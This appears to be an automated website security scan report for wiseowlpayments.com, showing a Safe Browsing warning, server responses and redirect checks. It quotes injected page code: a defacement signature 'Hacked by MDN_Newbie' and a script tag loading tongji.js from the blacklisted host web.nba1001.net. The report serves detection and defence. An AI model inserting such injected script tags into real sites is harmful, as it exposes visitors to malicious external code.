Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wiseowlpayments.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wiseowlpayments.com/ | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 17:12:49 GMT Location: http://wiseowlpayments.com/cgi-sys/suspendedpage.cgi Server: Apache Vary: Accept-Encoding Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://wiseowlpayments.com/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 3081 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: web.nba1001.net ...[3290 bytes skipped]... http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"><param value="#ffffff" name="bgcolor"><param value="mp3=http://musicupload99999.googlecode.com/files/The%20Red%20Jumpsuit%20Apparatus%20-%20Face%20Down%28Screamo%20Version%29.mp3&loop=1&autoplay=1&volume=125" name="FlashVars"></object> </html><script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script> Deface/Content modification. The following signature was found: Hacked by MDN_Newbie <!DOCTYPE html>
<html lang="en" class="no-js"> <link href="https://upload.wikimedia.org/wikipedia/commons/7/7e/Animated-Flag-Indonesia.gif" rel="shortcut icon"/> <title>Hacked by MDN_Newbie </title> <script src='http://adithya.googlecode.com/files/Apctrl%2Bu.js' type='text/javascript'></script></head> <body onselectstart="return false" ondragstart="return false" oncontextmenu="return false" onLoad="writetext()" text="#167715" background="http://i.jootix.com/o/Alone-Girl.jpg" bgcolor="#00ff00"> <script language=JavaScript> <body> <meta charset= ...[3129 bytes skipped]... | ||
http://adithya.googlecode.com/files/Apctrl%2Bu.js | 404 Not Found Content-Length: 1444 Content-Type: text/html | clean |
http://adithya.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://adithya.googlecode.com/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js | 200 OK Content-Length: 92629 Content-Type: text/javascript | clean |
http://wiseowlpayments.com/js/jquery.lettering.js | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Dec 2014 17:12:53 GMT Location: http://wiseowlpayments.com/cgi-sys/suspendedpage.cgi Server: Apache Vary: Accept-Encoding Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://web.nba1001.net:8888/tj/tongji.js | 500 Can't connect to web.nba1001.net:8888 Content-Length: 192 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wiseowlpayments.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Thu, 25 Dec 2014 17:12:49 GMT
Location: http://wiseowlpayments.com/cgi-sys/suspendedpage.cgi
Server: Apache
Vary: Accept-Encoding
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
GET / HTTP/1.1
Host: wiseowlpayments.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Thu, 25 Dec 2014 17:12:49 GMT
Location: http://wiseowlpayments.com/cgi-sys/suspendedpage.cgi
Server: Apache
Vary: Accept-Encoding
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wiseowlpayments.com
Referer: http://www.google.com/search?q=wiseowlpayments.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wiseowlpayments.com
Referer: http://www.google.com/search?q=wiseowlpayments.com
Result:
The result is similar to the first query. There are no suspicious redirects found.